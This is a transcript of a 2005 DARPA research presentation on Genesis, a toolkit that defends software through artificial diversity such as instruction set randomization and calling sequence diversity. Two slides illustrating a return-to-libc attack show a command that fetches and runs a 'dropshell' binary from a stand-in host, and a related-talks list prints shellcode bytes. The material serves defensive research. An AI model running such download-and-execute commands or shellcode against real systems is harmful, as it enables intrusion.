Presentation is loading. Please wait.

Presentation is loading. Please wait.

G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi.

Published byJulian Hensley Modified over 9 years ago

Similar presentations

Presentation on theme: "G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi."— Presentation transcript:

1 G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi Wang Carnegie Mellon University

2 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting2 Project Overview Existing practice: Monoculture Technical objectives: Exploit artificial diversity to break existing software monoculture Technical approach: Artificial diversity at compile, link, load, and execution times Combinations selectable with toolkit

3 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting3 Major risks and planned mitigation: Susceptibility to new class of attacks Deployment issues Ad hoc evaluation Quantitative metrics: Fraction of variants that remain susceptible to attack after transformation Expected major achievements: Significant reduction in susceptibility Task milestones (schedule 12/31/05): Complete diversity toolkit Evaluate complete spectrum of diversity techniques Project Overview

4 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting4 Genesis Diversity Toolkit

5 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting5 Genesis Diversity Generator

6 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting6

7 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting7 Strong ISR using AES and IT Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanovi, ACM Transactions on Information System Security. 8(1), pp. 3-40. Current implementations of ISR execute injected code Random instruction sequences are executed Rely on probabilistic arguments that the random sequences will crash harmlessly Not realistic for critical embedded systems Recovery of application is difficult/impossible Vulnerable to attack Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005. Overhead issues (both space and time)

8 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting8 Strong ISR using AES and IT

9 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting9 Strong ISR using AES and IT

10 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting10 CSD: Calling sequence diversity Compile-time/runtime technique to create a software population with many different calling sequences Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27) Return-to-libc does not require injecting code into the application ISR is not an effective defense against return-to-libc type attacks

11 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting11 Return-to-libc attack void bar(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } … arg2 arg1 return addr Saved ebp buffer Runtime Stack … arg2 Bad arg system Saved ebp buffer Runtime Stack Buffer Overflow wget: http://www.example.com/dropshell ;http://www.example.com/dropshell chmod +x dropshell ;./dropshell

12 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting12 void bar() { … key=Keygen(key, &bar, &foo); foo(arg1, arg2); key=Keygen(key, &foo, &bar); … key=Keygen(key, &bar, &baz); baz(arg); key=Keygen(key, &baz, &bar); … } void foo(int a1, int a2) { Keycheck(key); … Keycheck(key); } CSD: Calling sequence diversity

13 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting13 CSD: Calling sequence diversity Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix) At runtime: Strata generates a key for each function (stored in protected region) Replaces calls with inline code to generate proper key or check that the key has the proper value

14 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting14 Return-to-libc attack void bad(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } … arg2 arg1 return addr Saved ebp buffer Runtime Stack … arg2 Bad arg system Saved ebp buffer Runtime Stack Buffer Overflow wget: http://www.example.com/dropshell ;http://www.example.com/dropshell chmod +x dropshell ;./dropshell

15 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting15 Genesis Diversity Toolkit

16 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting16 Toolkit Execution Environment

17 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting17

18 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting18 Performance

19 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting19 Progress Towards Metric Diversity toolkit facilitates: Creation of large number of variants Operating, attacking & monitoring variants Large numbers of variants of Apache created and tested, success rate very high Disclaimers: Only one application Synthetic but realistic vulnerabilities No statistical significance

20 University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting20 Impediments To Success Possibly unacceptable execution performance degradation Unknown security performance against other types of vulnerabilities Need to investigate the spectrum of diversity defense techniques Cost of deployment and maintenance of the variants might be high

Download ppt "G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi."

Similar presentations

ROP is Still Dangerous: Breaking Modern Defenses Nicholas Carlini et. al University of California, Berkeley USENIX Security 2014 Presenter: Yue Li Part.

ROP is Still Dangerous: Breaking Modern Defenses Nicholas Carlini et. al University of California, Berkeley USENIX Security 2014 Presenter: Yue Li Part.
David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.

David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.
Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.

Lecture 16 Buffer Overflow modified from slides of Lawrie Brown.
Moving Target Defense in Cyber Security

Moving Target Defense in Cyber Security
Dec 5, 2007University of Virginia1 Efficient Dynamic Tainting using Multiple Cores Yan Huang University of Virginia Dec. 5 2007.

Dec 5, 2007University of Virginia1 Efficient Dynamic Tainting using Multiple Cores Yan Huang University of Virginia Dec
University of VirginiaDARPA SRS - 27 Jan 20051 Effectiveness of Instruction Set Randomization Ana Nora Sovarel and David Evans DARPA SRS – Genesis Project.

University of VirginiaDARPA SRS - 27 Jan Effectiveness of Instruction Set Randomization Ana Nora Sovarel and David Evans DARPA SRS – Genesis Project.
Chapter 2 The Software Process

Chapter 2 The Software Process
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
Buffer Overflow Prevention ”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80” Presented to CRAB April.

Buffer Overflow Prevention ”\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x53\x50\x54\x53\xb0\x3b\x50\xcd\x80” Presented to CRAB April.
Instruction-Set Randomization “Countering Code-Injection Attacks With Instruction-Set Randomization” G. Kc, A. Keromytis, and V. Prevelakis CCS October.

Instruction-Set Randomization “Countering Code-Injection Attacks With Instruction-Set Randomization” G. Kc, A. Keromytis, and V. Prevelakis CCS October.
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
Design of a Framework for Testing Security Mechanisms for Program-Based Attacks Ben “Security” Breech and Lori Pollock University of Delaware.

Design of a Framework for Testing Security Mechanisms for Program-Based Attacks Ben “Security” Breech and Lori Pollock University of Delaware.
G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi.

G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi.
Stack buffer overflow http://en.wikipedia.org/wiki/Stack_buffer_overflow.

Stack buffer overflow
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:

Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:
Security Protection and Checking in Embedded System Integration Against Buffer Overflow Attacks Zili Shao, Chun Xue, Qingfeng Zhuge, Edwin H.-M. Sha International.

Security Protection and Checking in Embedded System Integration Against Buffer Overflow Attacks Zili Shao, Chun Xue, Qingfeng Zhuge, Edwin H.-M. Sha International.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.

Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Securing Software Systems Gaurav S. Kc Programming Systems Lab 9 th April, 2003.

Securing Software Systems Gaurav S. Kc Programming Systems Lab 9 th April, 2003.
Achieving Trusted Systems by Providing Security and Reliability Ravishankar K. Iyer, Zbigniew Kalbarczyk, Jun Xu, Shuo Chen, Nithin Nakka and Karthik Pattabiraman.

Achieving Trusted Systems by Providing Security and Reliability Ravishankar K. Iyer, Zbigniew Kalbarczyk, Jun Xu, Shuo Chen, Nithin Nakka and Karthik Pattabiraman.

Similar presentations

Ads by Google